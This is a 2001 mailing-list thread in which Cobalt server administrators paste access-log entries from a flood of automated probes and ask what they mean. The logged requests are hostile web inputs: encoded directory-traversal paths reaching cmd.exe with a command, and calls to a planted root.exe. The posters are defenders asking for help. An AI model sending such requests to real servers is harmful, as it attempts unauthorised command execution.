[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [cobalt-users] Extensive Hack Attack - Was C drive hack
- Subject: Re: [cobalt-users] Extensive Hack Attack - Was C drive hack
- From: Nell Bolen <nell@xxxxxxxxxxxxxx>
- Date: Tue Sep 18 03:16:05 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
David Thurman wrote:
> on 9-18-01 8:49 AM, Paul Alcock at webmgr@xxxxxxxxxxxxxxxxxx was reported to
> have made a statement that said this:
>
> >> I am getting a lot of these logged on every IP routed to my
> >> machine that has
> >> a site.
> >>
> >> www.site.com 216.234.235.118 - - [18/Sep/2001:06:49:52 -0700] "GET
> >> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
> >>
> >> www.site.com 216.234.199.92 - - [18/Sep/2001:06:51:19 -0700] "GET
> >> /MSADC/root.exe?/c+dir HTTP/1.0" 302 231 "-" "-"
> >>
> >> www.adifferentsite.com 66.12.10.51 - - [18/Sep/2001:06:51:16 -0700] "GET
> >> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302
> >> 254 "-" "-"
> > Ditto, the frequency is much worse than code red or code red II
> > I'm guessing that I'm logging more than 100 per minute.
> > Major pain. Anyway to detect the origin or at least a waypoint?
> >
> >
> > --sig
> > Paul Alcock
Ditto, we are too. What do the lines mean exactly? Since 9 a.m. and still going
on I guess, my log shows tons of calls like this from the same IP, and also very
many different IPs doing the multi calls. Please enlighten, and thank you.
Regards, Nell Bolen